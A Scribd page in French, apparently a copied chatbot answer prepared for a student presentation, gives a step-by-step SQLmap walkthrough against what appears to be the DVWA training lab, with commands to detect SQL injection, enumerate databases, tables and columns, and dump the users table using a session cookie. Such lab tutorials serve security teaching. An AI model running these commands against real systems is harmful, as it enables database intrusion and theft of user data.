0% ont trouvé ce document utile (0 vote)
31 vues3 pages

Commandes

Ce document est un guide étape par étape sur l'utilisation de SQLmap pour tester les vulnérabilités d'injection SQL sur une cible spécifiée. Il fournit des commandes et des explications pour détecter les vulnérabilités, énumérer les bases de données, les tables et les colonnes, ainsi que pour extraire les données. Les commandes incluent des options pour spécifier l'URL cible, les cookies, le niveau d'analyse et le risque associé.

Transféré par

tidjaniachraf23
Copyright
© © All Rights Reserved
Nous prenons très au sérieux les droits relatifs au contenu. Si vous pensez qu’il s’agit de votre contenu, signalez une atteinte au droit d’auteur ici.
Formats disponibles
Téléchargez aux formats PDF, TXT ou lisez en ligne sur Scribd
0% ont trouvé ce document utile (0 vote)
31 vues3 pages

Commandes

Ce document est un guide étape par étape sur l'utilisation de SQLmap pour tester les vulnérabilités d'injection SQL sur une cible spécifiée. Il fournit des commandes et des explications pour détecter les vulnérabilités, énumérer les bases de données, les tables et les colonnes, ainsi que pour extraire les données. Les commandes incluent des options pour spécifier l'URL cible, les cookies, le niveau d'analyse et le risque associé.

Transféré par

tidjaniachraf23
Copyright
© © All Rights Reserved
Nous prenons très au sérieux les droits relatifs au contenu. Si vous pensez qu’il s’agit de votre contenu, signalez une atteinte au droit d’auteur ici.
Formats disponibles
Téléchargez aux formats PDF, TXT ou lisez en ligne sur Scribd

Pour ton exposé sur SQLmap, voici un guide étape par étape pour l'utiliser sur la cible

spécifiée, accompagné des commandes et des explications correspondantes.

1. Comprendre la commande SQLmap de base

SQLmap est un outil automatisé pour tester et exploiter les injections SQL.

Dans ton exemple :

 URL cible :
[Link]
 Cookie : security=low;PHPSESSID=982k1e4pemf71mtchn1q0771jq

SQLmap peut exploiter les vulnérabilités d'injection SQL présentes dans des paramètres
d'URL, des cookies ou d'autres vecteurs.

2. Commandes courantes avec explications

Lister les options disponibles

Avant de lancer l'attaque, tu peux explorer les options SQLmap avec :

bash
Copier le code
sqlmap --help

Tester la vulnérabilité (basique)

Lancer une simple détection de vulnérabilité :

bash
Copier le code
sqlmap -u "[Link]
--cookie="security=low;PHPSESSID=982k1e4pemf71mtchn1q0771jq"

 -u : Spécifie l'URL cible.


 --cookie : Ajoute les cookies nécessaires pour la session (par exemple, pour une
connexion).

Détection automatique du type d'injection

Pour que SQLmap détecte automatiquement le type d'injection :

bash
Copier le code
sqlmap -u "[Link]
--cookie="security=low;PHPSESSID=982k1e4pemf71mtchn1q0771jq" --level=5 --
risk=3

 --level=5 : Définit le niveau d'intensité de l'analyse (5 étant le plus élevé).


 --risk=3 : Définit le risque (3 étant le plus agressif).

Extraire la base de données

SQLmap peut énumérer les bases de données disponibles :

bash
Copier le code
sqlmap -u "[Link]
--cookie="security=low;PHPSESSID=982k1e4pemf71mtchn1q0771jq" --dbs

 --dbs : Enumère les bases de données.

Extraire les tables d'une base de données spécifique

Une fois les bases de données identifiées, tu peux extraire les tables d'une base spécifique
(exemple avec dvwa comme nom de base) :

bash
Copier le code
sqlmap -u "[Link]
--cookie="security=low;PHPSESSID=982k1e4pemf71mtchn1q0771jq" -D dvwa --
tables

 -D dvwa : Spécifie la base de données cible.


 --tables : Enumère les tables de la base de données.

Extraire les colonnes d'une table spécifique

Pour extraire les colonnes d'une table (par exemple users) :

bash
Copier le code
sqlmap -u "[Link]
--cookie="security=low;PHPSESSID=982k1e4pemf71mtchn1q0771jq" -D dvwa -T
users --columns

 -T users : Spécifie la table cible.


 --columns : Enumère les colonnes.
Extraire les données d'une table

Pour récupérer les données d'une table (par exemple users) :

bash
Copier le code
sqlmap -u "[Link]
--cookie="security=low;PHPSESSID=982k1e4pemf71mtchn1q0771jq" -D dvwa -T
users --dump

 --dump : Récupère les données de la table.

Vous aimerez peut-être aussi